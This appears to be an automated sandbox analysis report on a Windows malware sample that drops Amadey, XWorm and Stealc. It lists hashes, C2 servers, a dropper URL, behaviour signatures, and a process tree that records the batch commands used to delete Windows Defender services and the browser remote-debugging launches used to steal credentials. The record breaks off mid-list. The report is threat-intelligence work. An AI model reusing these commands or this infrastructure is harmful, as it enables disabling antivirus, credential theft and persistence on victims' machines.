Analysis

  • max time kernel
    87s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    27/03/2025, 04:27

General

  • Target

    bc1f7ca5b344ac935361475d3a386ca9c17ae5b856e1028622d2a7131d6eb666.exe

  • Size

    1.8MB

  • MD5

    d5f6e39b19e5b45d9953d4cb1401cc51

  • SHA1

    c20f5112e5c6743247c3aa2939bbac098e7df551

  • SHA256

    bc1f7ca5b344ac935361475d3a386ca9c17ae5b856e1028622d2a7131d6eb666

  • SHA512

    b63a89ec0df2dd5c836e03d5c4f2b74acd5444499ac728eb66d9cc55d892b85819ceb10c98bb96067170fa4d0ac34cc72c3f839e8f4c1c740d7e50d27e6fb298

  • SSDEEP

    24576:kUAfrVg7JIB/RwQTo1ozluw6kJ4AoZRvMfyTY/e63AlMYe/t4SHd4lU55eoyyT0O:7Af5g766QTNv6i4Zrng2lMff9Pei0

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

xworm

Version

5.0

C2

b.strongest.network:22394

Mutex

arwpWzcFwkBy2ZX1

Attributes
  • Install_directory

    %AppData%

  • install_file

    MsWin32tart.exe

aes.plain

Extracted

Family

stealc

Botnet

trump

C2

http://45.93.20.28

Attributes
  • url_path

    /85a1cacf11314eb8.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detect Xworm Payload 2 IoCs
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • Modifies security service 2 TTPs 2 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file 17 IoCs
  • Possible privilege escalation attempt 2 IoCs
  • Stops running service(s) 4 TTPs
  • Uses browser remote debugging 2 TTPs 8 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks BIOS information in registry 2 TTPs 14 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 6 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Deletes itself 1 IoCs
  • Drops startup file 2 IoCs
  • Executes dropped EXE 19 IoCs
  • Identifies Wine through registry keys 2 TTPs 7 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 2 IoCs
  • Modifies file permissions 1 TTPs 2 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 7 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops desktop.ini file(s) 3 IoCs
  • AutoIT Executable 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Enumerates processes with tasklist 1 TTPs 4 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 1 IoCs
  • Launches sc.exe 38 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 22 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 24 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies data under HKEY_USERS 3 IoCs
  • Modifies registry class 3 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 52 IoCs
  • Suspicious behavior: LoadsDriver 2 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 19 IoCs
  • Suspicious use of FindShellTrayWindow 56 IoCs
  • Suspicious use of SendNotifyMessage 23 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\bc1f7ca5b344ac935361475d3a386ca9c17ae5b856e1028622d2a7131d6eb666.exe
    "C:\Users\Admin\AppData\Local\Temp\bc1f7ca5b344ac935361475d3a386ca9c17ae5b856e1028622d2a7131d6eb666.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks computer location settings
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2460
    • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
      "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Downloads MZ/PE file
      • Checks BIOS information in registry
      • Checks computer location settings
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:1972
      • C:\Users\Admin\AppData\Local\Temp\10345050101\apple.exe
        "C:\Users\Admin\AppData\Local\Temp\10345050101\apple.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:900
        • C:\Users\Admin\AppData\Local\Temp\22.exe
          "C:\Users\Admin\AppData\Local\Temp\22.exe"
          4⤵
          • Checks computer location settings
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3668
          • C:\Windows\system32\cmd.exe
            "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\91D0.tmp\91D1.tmp\91D2.bat C:\Users\Admin\AppData\Local\Temp\22.exe"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:5824
            • C:\Users\Admin\AppData\Local\Temp\22.exe
              "C:\Users\Admin\AppData\Local\Temp\22.exe" go
              6⤵
              • Checks computer location settings
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:3696
              • C:\Windows\system32\cmd.exe
                "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9308.tmp\9309.tmp\930A.bat C:\Users\Admin\AppData\Local\Temp\22.exe go"
                7⤵
                • Drops file in Program Files directory
                • Suspicious use of WriteProcessMemory
                PID:1212
                • C:\Windows\system32\sc.exe
                  sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
                  8⤵
                  • Launches sc.exe
                  PID:400
                • C:\Windows\system32\sc.exe
                  sc start ddrver
                  8⤵
                  • Launches sc.exe
                  PID:3020
                • C:\Windows\system32\timeout.exe
                  timeout /t 1
                  8⤵
                  • Delays execution with timeout.exe
                  PID:5192
                • C:\Windows\system32\sc.exe
                  sc stop ddrver
                  8⤵
                  • Launches sc.exe
                  PID:5652
                • C:\Windows\system32\sc.exe
                  sc start ddrver
                  8⤵
                  • Launches sc.exe
                  PID:5884
                • C:\Windows\system32\takeown.exe
                  takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
                  8⤵
                  • Possible privilege escalation attempt
                  • Modifies file permissions
                  PID:840
                • C:\Windows\system32\icacls.exe
                  icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
                  8⤵
                  • Possible privilege escalation attempt
                  • Modifies file permissions
                  PID:464
                • C:\Windows\system32\sc.exe
                  sc stop "WinDefend"
                  8⤵
                  • Launches sc.exe
                  PID:5104
                • C:\Windows\system32\sc.exe
                  sc delete "WinDefend"
                  8⤵
                  • Launches sc.exe
                  PID:4956
                • C:\Windows\system32\reg.exe
                  reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
                  8⤵
                    PID:5464
                  • C:\Windows\system32\sc.exe
                    sc stop "MDCoreSvc"
                    8⤵
                    • Launches sc.exe
                    PID:2276
                  • C:\Windows\system32\sc.exe
                    sc delete "MDCoreSvc"
                    8⤵
                    • Launches sc.exe
                    PID:1608
                  • C:\Windows\system32\reg.exe
                    reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
                    8⤵
                      PID:1960
                    • C:\Windows\system32\sc.exe
                      sc stop "WdNisSvc"
                      8⤵
                      • Launches sc.exe
                      PID:1816
                    • C:\Windows\system32\sc.exe
                      sc delete "WdNisSvc"
                      8⤵
                      • Launches sc.exe
                      PID:2648
                    • C:\Windows\system32\reg.exe
                      reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
                      8⤵
                        PID:5448
                      • C:\Windows\system32\sc.exe
                        sc stop "Sense"
                        8⤵
                        • Launches sc.exe
                        PID:4980
                      • C:\Windows\system32\sc.exe
                        sc delete "Sense"
                        8⤵
                        • Launches sc.exe
                        PID:1468
                      • C:\Windows\system32\reg.exe
                        reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
                        8⤵
                          PID:3560
                        • C:\Windows\system32\sc.exe
                          sc stop "wscsvc"
                          8⤵
                          • Launches sc.exe
                          PID:5376
                        • C:\Windows\system32\sc.exe
                          sc delete "wscsvc"
                          8⤵
                          • Launches sc.exe
                          PID:3256
                        • C:\Windows\system32\reg.exe
                          reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
                          8⤵
                          • Modifies security service
                          PID:736
                        • C:\Windows\system32\sc.exe
                          sc stop "SgrmBroker"
                          8⤵
                          • Launches sc.exe
                          PID:3404
                        • C:\Windows\system32\sc.exe
                          sc delete "SgrmBroker"
                          8⤵
                          • Launches sc.exe
                          PID:3660
                        • C:\Windows\system32\reg.exe
                          reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
                          8⤵
                            PID:2436
                          • C:\Windows\system32\sc.exe
                            sc stop "SecurityHealthService"
                            8⤵
                            • Launches sc.exe
                            PID:5216
                          • C:\Windows\system32\sc.exe
                            sc delete "SecurityHealthService"
                            8⤵
                            • Launches sc.exe
                            PID:5248
                          • C:\Windows\system32\reg.exe
                            reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
                            8⤵
                              PID:1284
                            • C:\Windows\system32\sc.exe
                              sc stop "webthreatdefsvc"
                              8⤵
                              • Launches sc.exe
                              PID:1008
                            • C:\Windows\system32\sc.exe
                              sc delete "webthreatdefsvc"
                              8⤵
                              • Launches sc.exe
                              PID:5068
                            • C:\Windows\system32\reg.exe
                              reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
                              8⤵
                                PID:1764
                              • C:\Windows\system32\sc.exe
                                sc stop "webthreatdefusersvc"
                                8⤵
                                • Launches sc.exe
                                PID:4908
                              • C:\Windows\system32\sc.exe
                                sc delete "webthreatdefusersvc"
                                8⤵
                                • Launches sc.exe
                                PID:1504
                              • C:\Windows\system32\reg.exe
                                reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
                                8⤵
                                  PID:2696
                                • C:\Windows\system32\sc.exe
                                  sc stop "WdNisDrv"
                                  8⤵
                                  • Launches sc.exe
                                  PID:3232
                                • C:\Windows\system32\sc.exe
                                  sc delete "WdNisDrv"
                                  8⤵
                                  • Launches sc.exe
                                  PID:5444
                                • C:\Windows\system32\reg.exe
                                  reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
                                  8⤵
                                    PID:264
                                  • C:\Windows\system32\sc.exe
                                    sc stop "WdBoot"
                                    8⤵
                                    • Launches sc.exe
                                    PID:1132
                                  • C:\Windows\system32\sc.exe
                                    sc delete "WdBoot"
                                    8⤵
                                    • Launches sc.exe
                                    PID:2500
                                  • C:\Windows\system32\reg.exe
                                    reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
                                    8⤵
                                      PID:3276
                                    • C:\Windows\system32\sc.exe
                                      sc stop "WdFilter"
                                      8⤵
                                      • Launches sc.exe
                                      PID:3616
                                    • C:\Windows\system32\sc.exe
                                      sc delete "WdFilter"
                                      8⤵
                                      • Launches sc.exe
                                      PID:5916
                                    • C:\Windows\system32\reg.exe
                                      reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
                                      8⤵
                                        PID:5892
                                      • C:\Windows\system32\sc.exe
                                        sc stop "SgrmAgent"
                                        8⤵
                                        • Launches sc.exe
                                        PID:3388
                                      • C:\Windows\system32\sc.exe
                                        sc delete "SgrmAgent"
                                        8⤵
                                        • Launches sc.exe
                                        PID:3772
                                      • C:\Windows\system32\reg.exe
                                        reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
                                        8⤵
                                          PID:624
                                        • C:\Windows\system32\sc.exe
                                          sc stop "MsSecWfp"
                                          8⤵
                                          • Launches sc.exe
                                          PID:916
                                        • C:\Windows\system32\sc.exe
                                          sc delete "MsSecWfp"
                                          8⤵
                                          • Launches sc.exe
                                          PID:3252
                                        • C:\Windows\system32\reg.exe
                                          reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
                                          8⤵
                                            PID:2496
                                          • C:\Windows\system32\sc.exe
                                            sc stop "MsSecFlt"
                                            8⤵
                                            • Launches sc.exe
                                            PID:1336
                                          • C:\Windows\system32\sc.exe
                                            sc delete "MsSecFlt"
                                            8⤵
                                            • Launches sc.exe
                                            PID:2484
                                          • C:\Windows\system32\reg.exe
                                            reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
                                            8⤵
                                              PID:1228
                                            • C:\Windows\system32\sc.exe
                                              sc stop "MsSecCore"
                                              8⤵
                                              • Launches sc.exe
                                              PID:3684
                                            • C:\Windows\system32\sc.exe
                                              sc delete "MsSecCore"
                                              8⤵
                                              • Launches sc.exe
                                              PID:2056
                                            • C:\Windows\system32\reg.exe
                                              reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
                                              8⤵
                                                PID:4976
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
                                                8⤵
                                                  PID:5540
                                                • C:\Windows\system32\schtasks.exe
                                                  schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
                                                  8⤵
                                                    PID:1260
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
                                                    8⤵
                                                      PID:6068
                                                    • C:\Windows\system32\schtasks.exe
                                                      schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
                                                      8⤵
                                                        PID:6044
                                                      • C:\Windows\system32\sc.exe
                                                        sc stop ddrver
                                                        8⤵
                                                        • Launches sc.exe
                                                        PID:5816
                                                      • C:\Windows\system32\sc.exe
                                                        sc delete ddrver
                                                        8⤵
                                                        • Launches sc.exe
                                                        PID:456
                                            • C:\Users\Admin\AppData\Local\Temp\10345240101\EPTwCQd.exe
                                              "C:\Users\Admin\AppData\Local\Temp\10345240101\EPTwCQd.exe"
                                              3⤵
                                              • Executes dropped EXE
                                              • Suspicious use of SetThreadContext
                                              PID:1824
                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                4⤵
                                                • System Location Discovery: System Language Discovery
                                                • Suspicious behavior: EnumeratesProcesses
                                                PID:4236
                                            • C:\Users\Admin\AppData\Local\Temp\10346230101\FjbTOQC.exe
                                              "C:\Users\Admin\AppData\Local\Temp\10346230101\FjbTOQC.exe"
                                              3⤵
                                              • Checks computer location settings
                                              • Drops startup file
                                              • Executes dropped EXE
                                              • Adds Run key to start application
                                              • Suspicious behavior: AddClipboardFormatListener
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:1044
                                              • C:\Windows\System32\schtasks.exe
                                                "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "MsWin32tart" /tr "C:\Users\Admin\AppData\Roaming\MsWin32tart.exe"
                                                4⤵
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:2288
                                            • C:\Users\Admin\AppData\Local\Temp\10346890101\132a2d7f4d.exe
                                              "C:\Users\Admin\AppData\Local\Temp\10346890101\132a2d7f4d.exe"
                                              3⤵
                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                              • Checks BIOS information in registry
                                              • Executes dropped EXE
                                              • Identifies Wine through registry keys
                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                              • System Location Discovery: System Language Discovery
                                              • Suspicious behavior: EnumeratesProcesses
                                              PID:2200
                                            • C:\Users\Admin\AppData\Local\Temp\10346900101\1b9f07e8f6.exe
                                              "C:\Users\Admin\AppData\Local\Temp\10346900101\1b9f07e8f6.exe"
                                              3⤵
                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                              • Downloads MZ/PE file
                                              • Checks BIOS information in registry
                                              • Executes dropped EXE
                                              • Identifies Wine through registry keys
                                              • Loads dropped DLL
                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                              • System Location Discovery: System Language Discovery
                                              • Checks processor information in registry
                                              • Suspicious behavior: EnumeratesProcesses
                                              PID:1048
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                                                4⤵
                                                • Uses browser remote debugging
                                                • Checks processor information in registry
                                                • Enumerates system info in registry
                                                • Modifies data under HKEY_USERS
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                • Suspicious use of AdjustPrivilegeToken
                                                • Suspicious use of FindShellTrayWindow
                                                PID:2060
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffa7d68dcf8,0x7ffa7d68dd04,0x7ffa7d68dd10
                                                  5⤵
                                                    PID:5020
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1728,i,7135530613799408395,6060445635774223405,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1724 /prefetch:2
                                                    5⤵
                                                      PID:2920
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1484,i,7135530613799408395,6060445635774223405,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2236 /prefetch:3
                                                      5⤵
                                                        PID:4988
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2348,i,7135530613799408395,6060445635774223405,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1900 /prefetch:8
                                                        5⤵
                                                          PID:5700
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3240,i,7135530613799408395,6060445635774223405,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3252 /prefetch:1
                                                          5⤵
                                                          • Uses browser remote debugging
                                                          PID:3276
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3260,i,7135530613799408395,6060445635774223405,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3288 /prefetch:1
                                                          5⤵
                                                          • Uses browser remote debugging
                                                          PID:3588
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4256,i,7135530613799408395,6060445635774223405,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4288 /prefetch:2
                                                          5⤵
                                                          • Uses browser remote debugging
                                                          PID:1680
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4636,i,7135530613799408395,6060445635774223405,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4612 /prefetch:1
                                                          5⤵
                                                          • Uses browser remote debugging
                                                          PID:1052
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5292,i,7135530613799408395,6060445635774223405,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5300 /prefetch:8
                                                          5⤵
                                                            PID:5796
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5484,i,7135530613799408395,6060445635774223405,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5496 /prefetch:8
                                                            5⤵
                                                              PID:3040
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5296,i,7135530613799408395,6060445635774223405,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5628 /prefetch:8
                                                              5⤵
                                                                PID:2500
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5732,i,7135530613799408395,6060445635774223405,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5420 /prefetch:8
                                                                5⤵
                                                                  PID:5956
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5280,i,7135530613799408395,6060445635774223405,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5720 /prefetch:8
                                                                  5⤵
                                                                    PID:4408
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5276,i,7135530613799408395,6060445635774223405,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5740 /prefetch:8
                                                                    5⤵
                                                                      PID:2344
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""
                                                                    4⤵
                                                                    • Uses browser remote debugging
                                                                    • Checks processor information in registry
                                                                    • Enumerates system info in registry
                                                                    • Modifies data under HKEY_USERS
                                                                    • Modifies registry class
                                                                    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                    • Suspicious use of FindShellTrayWindow
                                                                    PID:5956
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x238,0x250,0x7ffa7d32f208,0x7ffa7d32f214,0x7ffa7d32f220
                                                                      5⤵
                                                                        PID:3584
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=2184,i,8364431327338553577,7338955864024341559,262144 --variations-seed-version --mojo-platform-channel-handle=2180 /prefetch:3
                                                                        5⤵
                                                                          PID:3556
                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2084,i,8364431327338553577,7338955864024341559,262144 --variations-seed-version --mojo-platform-channel-handle=2068 /prefetch:2
                                                                          5⤵
                                                                            PID:5784
                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
